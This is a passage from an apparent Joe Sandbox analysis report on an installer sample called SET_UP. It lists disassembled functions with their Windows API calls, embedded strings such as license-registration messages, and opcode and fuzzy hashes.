                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: H_prolog$CrackDecrementHttpInterlockedlstrlen
                                                                                                                                                                                                  • String ID: <
                                                                                                                                                                                                  • API String ID: 665966979-4251816714
                                                                                                                                                                                                  • Opcode ID: bdd526c21f4952b85838583bbd9279a05e7652fcced5d2a9fd07a7a45c709d86
                                                                                                                                                                                                  • Instruction ID: 676e48099b8ddfda0302c449c0fcf29faa2d6c0ddb2cd1673c33d617bafb6090
                                                                                                                                                                                                  • Opcode Fuzzy Hash: bdd526c21f4952b85838583bbd9279a05e7652fcced5d2a9fd07a7a45c709d86
                                                                                                                                                                                                  • Instruction Fuzzy Hash: DB3162B1901209EFCB10EFA5D8859DEBB78FF14354F10812FF925A7291DB389A44CBA4
                                                                                                                                                                                                  Function 004148A5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 92COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                                                                  • String ID: $```
                                                                                                                                                                                                  • API String ID: 3519838083-3681826150
                                                                                                                                                                                                  • Opcode ID: 1653d858755140f7251e6d65577b66ee253ac18408065aa351f1eeec9fe643dc
                                                                                                                                                                                                  • Instruction ID: 0f3c25c9745e8274ab7d54f4c3ac35761cbfedea2c49ad7c46c9168909447a9b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1653d858755140f7251e6d65577b66ee253ac18408065aa351f1eeec9fe643dc
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D63190B1D00619CECF85DF69848069ABBF5FF49704F00416AED09EF246E3B59609CFA4
                                                                                                                                                                                                  Function 0040466F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 00404681
                                                                                                                                                                                                    • Part of subcall function 004C048E: SetBkColor.GDI32(?,?), ref: 004C049D
                                                                                                                                                                                                    • Part of subcall function 004C048E: ExtTextOutW.GDI32(?,00000000,00000000,00000002,00000000,00000000,00000000,00000000), ref: 004C04CF
                                                                                                                                                                                                  • CopyRect.USER32(?,?), ref: 004046D9
                                                                                                                                                                                                    • Part of subcall function 004B9458: SetBkMode.GDI32(00000000,?), ref: 004B9471
                                                                                                                                                                                                    • Part of subcall function 004B9458: SetBkMode.GDI32(00000000,?), ref: 004B947F
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ModeRect$ClientColorCopyText
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2917079683-1776720792
                                                                                                                                                                                                  • Opcode ID: 7ef3bbe2bc36061bb16bd8594df6e38ad7beda7422e316708abf2d4c2916176b
                                                                                                                                                                                                  • Instruction ID: c0bd325eb9edaa693153bb9bdbf36e52ddd8769a984a2f96b2a22607ae3d5344
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7ef3bbe2bc36061bb16bd8594df6e38ad7beda7422e316708abf2d4c2916176b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 93314B71600109AFCB15DFA9C988EAEBBB9FF48700F100159FA45E7291CB35AE41CFA5
                                                                                                                                                                                                  Function 0042D362 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 74COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 0042D367
                                                                                                                                                                                                    • Part of subcall function 004B4AB4: __EH_prolog.LIBCMT ref: 004B4AB9
                                                                                                                                                                                                    • Part of subcall function 0042AC4D: __EH_prolog.LIBCMT ref: 0042AC52
                                                                                                                                                                                                    • Part of subcall function 0041F3AE: __EH_prolog.LIBCMT ref: 0041F3B3
                                                                                                                                                                                                    • Part of subcall function 0042ACDA: __EH_prolog.LIBCMT ref: 0042ACDF
                                                                                                                                                                                                    • Part of subcall function 004B1C93: InterlockedIncrement.KERNEL32(-000000F4), ref: 004B1CA8
                                                                                                                                                                                                    • Part of subcall function 0041E716: __EH_prolog.LIBCMT ref: 0041E71B
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • Registered successfully!, xrefs: 0042D3C1
                                                                                                                                                                                                  • Failed to register: invalid user ID or license key!Please check your user ID and license key, then try again., xrefs: 0042D40D
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: H_prolog$IncrementInterlocked
                                                                                                                                                                                                  • String ID: Failed to register: invalid user ID or license key!Please check your user ID and license key, then try again.$Registered successfully!
                                                                                                                                                                                                  • API String ID: 2670639370-3175152671
                                                                                                                                                                                                  • Opcode ID: 840aa2bf2c92763592c035d47cd8258ff0e33ebe4d70f1431a829f16ff26985e
                                                                                                                                                                                                  • Instruction ID: 0b05744ef955be8f69d6b43fd836cb314d9f16fc65714dfa3ac647eaeea0a293
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 840aa2bf2c92763592c035d47cd8258ff0e33ebe4d70f1431a829f16ff26985e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 45219571E00218AFDB14FBA5D882EEEB778EB44358F10411FF411A3281DA785E45867D
                                                                                                                                                                                                  Function 0042D0F3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 70COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 0042D0F8
                                                                                                                                                                                                    • Part of subcall function 00429795: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,00509260,00000000,00000000,?,?,00000000,00421420,?), ref: 004297D4
                                                                                                                                                                                                    • Part of subcall function 00429795: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00429806
                                                                                                                                                                                                    • Part of subcall function 004B20E4: lstrlenA.KERNEL32(0040DAC6,?,?,00000104,0040DAC6,00000000), ref: 004B20F2
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • DH43Ydl65IZsIncKnCukuUZgGk8lLSBiC9JlaO5pxiioSXtl5iLTQEU1tnJMBYYUrjePIG9E6J210QFgWwjuRdsc2aw53GqaZ8NZn1itpwvhl52sBgi1RnIdSZhoMh5HDsHKqfILDCZFv6v28cEprsePAMJDPZRYkcZfO67eOCB7Nl66mjqbMZxkieIbqO773J8Qt94n, xrefs: 0042D16F
                                                                                                                                                                                                  • O2x, xrefs: 0042D16A
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ByteCharMultiWide$H_prologlstrlen
                                                                                                                                                                                                  • String ID: DH43Ydl65IZsIncKnCukuUZgGk8lLSBiC9JlaO5pxiioSXtl5iLTQEU1tnJMBYYUrjePIG9E6J210QFgWwjuRdsc2aw53GqaZ8NZn1itpwvhl52sBgi1RnIdSZhoMh5HDsHKqfILDCZFv6v28cEprsePAMJDPZRYkcZfO67eOCB7Nl66mjqbMZxkieIbqO773J8Qt94n$O2x
                                                                                                                                                                                                  • API String ID: 15792491-1487024302
                                                                                                                                                                                                  • Opcode ID: 918807a3faf2c6f5103b52547aa36839c79e8255ff1337fcfd3bad0e1b43736f
                                                                                                                                                                                                  • Instruction ID: 7dae4fdc46f3164a33aaad7653d4085f88cf5a82d21240e094289fe82bd8fb0b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 918807a3faf2c6f5103b52547aa36839c79e8255ff1337fcfd3bad0e1b43736f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2221B371E00228AADF10EA95CC45FEE7778AF04354F00416BF614E61C6DA7CEA54CBA9
                                                                                                                                                                                                  Function 004098CB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 004C0464: SetBkColor.GDI32(A5A5D47D,?), ref: 004C046E
                                                                                                                                                                                                    • Part of subcall function 004C0464: ExtTextOutW.GDI32(A5A5D47D,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 004C0484
                                                                                                                                                                                                  • CopyRect.USER32(?,?), ref: 00409968
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ColorCopyRectText
                                                                                                                                                                                                  • String ID: 000$000
                                                                                                                                                                                                  • API String ID: 2942875496-1659903649
                                                                                                                                                                                                  • Opcode ID: 76fd9f6673f0ff1199964a62212e4c41df5f0cbba771e9f0cd4d6a1604d6c173
                                                                                                                                                                                                  • Instruction ID: e4261128de05e3ab48bee50375693c033662dd262feb65b87427c380c0b90b23
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 76fd9f6673f0ff1199964a62212e4c41df5f0cbba771e9f0cd4d6a1604d6c173
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5C115CB5600105EBCF689F19C841EAF33ACEB44319B04413FF859E2382D638DD50CB59
                                                                                                                                                                                                  Function 0041D276 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 0041D27B
                                                                                                                                                                                                  • GetFileAttributesExW.KERNEL32(?,00000000,?), ref: 0041D2E4
                                                                                                                                                                                                    • Part of subcall function 004B223F: __EH_prolog.LIBCMT ref: 004B2244
                                                                                                                                                                                                    • Part of subcall function 004B1F26: InterlockedDecrement.KERNEL32(-000000F4), ref: 004B1F3A
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: H_prolog$AttributesDecrementFileInterlocked
                                                                                                                                                                                                  • String ID: \\?\
                                                                                                                                                                                                  • API String ID: 3189372264-4282027825
                                                                                                                                                                                                  • Opcode ID: a969e720bf536afc4b9dd47a84f9e4d997f258e1223dc1082b30ab8f946df0af
                                                                                                                                                                                                  • Instruction ID: ab99f974e13cf17f60880bcfae5786fe61e2514c4c4f9dba26f7ea444a15c3f8
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a969e720bf536afc4b9dd47a84f9e4d997f258e1223dc1082b30ab8f946df0af
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9511B471A0010CBFDB00EFA5CD81AEEBBA9EF04394F50412AF915E7190D7789E44C7A4
                                                                                                                                                                                                  Function 0042C901 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 0042C906
                                                                                                                                                                                                  • GetWindowsDirectoryW.KERNEL32(00000000,000003FF), ref: 0042C941
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: DirectoryH_prologWindows
                                                                                                                                                                                                  • String ID: \bootstat.dat
                                                                                                                                                                                                  • API String ID: 267778241-3340581324
                                                                                                                                                                                                  • Opcode ID: 809c75c3bb8c5f5f30f04107839fbce26dbfe17db5776a0ff9f4ceca5b51a32f
                                                                                                                                                                                                  • Instruction ID: a4819cab54d54e0b1b6568d446df3b77ed48ce680ecf3a8f8443c3ec73861aad
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 809c75c3bb8c5f5f30f04107839fbce26dbfe17db5776a0ff9f4ceca5b51a32f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3B2184B1E00219ABCF14EBA4DD45BEEB7B8BF44704F00416AE551B3190DB789B04CB95
                                                                                                                                                                                                  Function 00405E64 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61windowCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00405E69
                                                                                                                                                                                                  • BitBlt.GDI32(00000001,?,?,?,?,?,?,?,00CC0020), ref: 00405ECA
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                                                                  • String ID: VGL
                                                                                                                                                                                                  • API String ID: 3519838083-1461870441
                                                                                                                                                                                                  • Opcode ID: b9bde09658b15b9a9ecb758fdb79e7b7ccabf1a04ae072003ffda3473a0feb0f
                                                                                                                                                                                                  • Instruction ID: c47c0dd2ed25123d77661a7f479e15cc8a960f50679766d76dcb6a6db3a077be
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b9bde09658b15b9a9ecb758fdb79e7b7ccabf1a04ae072003ffda3473a0feb0f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D2214D71900A05DFCB20DFA9C985A6BFBF5FF08304B104A2EE59653690C774A901CFA4
                                                                                                                                                                                                  Function 00429576 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                                                                  • String ID: kbps$Auto
                                                                                                                                                                                                  • API String ID: 3519838083-1383899201
                                                                                                                                                                                                  • Opcode ID: 6f72ccfb6b37e4e1d1285a588751990e6347b6ffd7e863887f0ef2a7b00d9f37
                                                                                                                                                                                                  • Instruction ID: f0517e983c3985af7d61959fd3f52b695e5a78e81de0e4351f5d1ec8abc94d4e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6f72ccfb6b37e4e1d1285a588751990e6347b6ffd7e863887f0ef2a7b00d9f37
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3E114C71A0025AEBCF15EF91D892AFEB734FB14354F40442FF51166181DBBC9A48CB66
                                                                                                                                                                                                  Function 00435CB5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • PathIsURLW.SHLWAPI(?), ref: 00435CD4
                                                                                                                                                                                                  • PathFileExistsW.SHLWAPI(?), ref: 00435CE2
                                                                                                                                                                                                    • Part of subcall function 0042AD95: __EH_prolog.LIBCMT ref: 0042AD9A
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Path$ExistsFileH_prolog
                                                                                                                                                                                                  • String ID: File does not exist.
                                                                                                                                                                                                  • API String ID: 584446075-164382929
                                                                                                                                                                                                  • Opcode ID: 8ffd6dfdc0ada0922521d999ad6e9a663775bf2aba6a4440ecc947e6ef0a675f
                                                                                                                                                                                                  • Instruction ID: 4018de0b06c009dd928bcfbcd451c996dbbe467974e9413f3b3b191da976ff6f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8ffd6dfdc0ada0922521d999ad6e9a663775bf2aba6a4440ecc947e6ef0a675f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: AA0148317046055BC7105F299C88D2B7B99DB95329F60123AF816D73D2EE398C01872A
                                                                                                                                                                                                  Function 00439E66 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00439E6B
                                                                                                                                                                                                    • Part of subcall function 00439D87: __EH_prolog.LIBCMT ref: 00439D8C
                                                                                                                                                                                                    • Part of subcall function 004B1F26: InterlockedDecrement.KERNEL32(-000000F4), ref: 004B1F3A
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
